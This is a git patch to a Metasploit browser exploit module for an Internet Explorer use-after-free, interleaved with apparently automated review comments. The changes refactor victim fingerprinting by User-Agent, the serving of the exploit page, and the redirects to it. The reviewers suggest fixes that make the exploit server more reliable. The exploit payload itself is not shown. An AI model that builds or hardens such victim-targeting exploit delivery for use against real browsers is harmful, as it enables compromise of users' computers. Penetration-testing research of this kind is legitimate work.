From 2db2c780d62d28307226a11c692e93addd72f839 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Mon, 24 Sep 2012 17:38:19 -0500
Subject: [PATCH] Additional changes
Updated get_target function, comment for original author, possible bug in handling page redirection.
---
.../windows/browser/ie_execcommand_uaf.rb | 56 +++++++++++--------
1 file changed, 32 insertions(+), 24 deletions(-)
diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
index aa7dac9eaa..cb24f19783 100644
--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'Author' =>
 [
- 'unknown', # Some secret ninja
+ 'unknown', # via ZDI
 'eromang', # First public discovery
 'binjo',
 'sinn3r', # Metasploit
@@ -90,21 +90,28 @@ class Metasploit3 < Msf::Exploit::Remote
 #If the user is already specified by the user, we'll just use that
 return target if target.name != 'Automatic'
- if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
- return targets[1] #IE 7 on Windows XP SP3
- elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
- return targets[2] #IE 8 on Windows XP SP3
- elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
- return targets[3] #IE 7 on Windows Vista
- elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/
- return targets[4] #IE 8 on Windows Vista
- elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
- return targets[5] #IE 8 on Windows 7
- elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
- return targets[6] #IE 9 on Windows 7
- else
- return nil
+ nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+ ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
+
+ ie_name = "IE #{ie}"
+
+ case nt
+ when '5.1'
+ os_name = 'Windows XP SP3'
+ when '6.0'
+ os_name = 'Windows Vista'
+ when '6.1'
+ os_name = 'Windows 7'
 end
+
+ targets.each do |t|
+ if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+ vprint_status("Target selected as: #{t.name}")
+ return t
+ end
+ end
+
+ return nil
 end
 def junk(n=4)
@@ -294,7 +301,7 @@ class Metasploit3 < Msf::Exploit::Remote
 js.obfuscate
 end
- html = <<-EOS
+ html = %Q|
- EOS
+ |
 return html
 end
@@ -345,10 +352,13 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def on_request_uri(cli, request)
- print_status request.headers['User-Agent']
- agent = request.headers['User-Agent']
+ uri = request.uri
+ agent = request.headers['User-Agent']
 my_target = get_target(agent)
+ vprint_status("Requesting: #{uri}")
+ print_status(agent)
+
 # Avoid the attack if the victim doesn't have the same setup we're targeting
 if my_target.nil?
 print_error("Browser not supported, sending a 404: #{agent.to_s}")
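Review bot: In the new `targets.each` loop, `os_name` is left nil whenever `nt` is a version other than 5.1, 6.0 or 6.1 (a User-Agent reporting NT 6.2, for instance), and because `nt` is then non-empty the `!nt.empty?` guard does not stop `t.name.include?(os_name)`, which raises TypeError on nil instead of falling through to `return nil` as the old `=~` chain did. Guard on the resolved name rather than the raw version: `if (!ie.empty? and t.name.include?(ie_name)) and (os_name and t.name.include?(os_name))`. Separately, `/MSIE (\d)/` captures a single digit, so a two-digit version string would be read as "IE 1"; `/MSIE (\d+)/` keeps `ie_name` accurate. The `def get_target` line itself lies above this hunk.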
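Review bot: `%Q|...|` terminates at the first unescaped `|` inside the literal, a constraint the `<<-EOS` heredoc it replaces did not have, and the literal's body is not shown in this hunk; if the embedded markup or script contains a `|` anywhere (a JavaScript `||`, for example) the string ends early and the remainder is parsed as Ruby. Unless the body is known to be free of that character, keeping the heredoc form (`html = <<-EOS` ... `EOS`) is the safer choice.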
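Review bot: `agent = request.headers['User-Agent']` is nil for a request that carries no User-Agent header, and with the Automatic target `get_target(agent)` now calls `agent.scan`, so such a request raises NoMethodError inside get_target where the previous `=~` comparisons simply matched nothing; the `agent.to_s` in the `print_error` call a few lines down suggests the nil case was anticipated. Coerce once at the source: `agent = request.headers['User-Agent'].to_s`, which also keeps `print_status(agent)` from printing a bare nil. on_request_uri continues past the end of this hunk.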
@@ -356,15 +366,13 @@ class Metasploit3 < Msf::Exploit::Remote
 return
 end
- vprint_status("Requesting: #{request.uri}")
-
- if request.uri =~ /#{@html2_name}/
+ if uri =~ /#{@html2_name}/
 print_status("Loading #{@html2_name}")
 html = load_html2
- elsif request.uri =~ /#{@html1_name}/
+ elsif uri =~ /#{@html1_name}/
 print_status("Loading #{@html1_name}")
 html = load_html1(cli, my_target)
- elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
+ elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
 print_status("Redirecting to #{@html1_name}")
 send_redirect(cli, "#{this_resource}/#{@html1_name}")
 return
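Review bot: `this_resource` is interpolated into `/#{this_resource}$/` without escaping, so any regex metacharacter in the configured resource path (`.`, `?`, `+`, an unbalanced `(`) either loosens the match or raises RegexpError at request time; `Regexp.escape` keeps the comparison literal: `elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{Regexp.escape(this_resource)}$/)`. The same applies to the `@html1_name` and `@html2_name` interpolations in this hunk unless those names are generated from a character set that cannot contain metacharacters, which is not visible here. `this_resource` is defined outside the hunk, and on_request_uri begins before it.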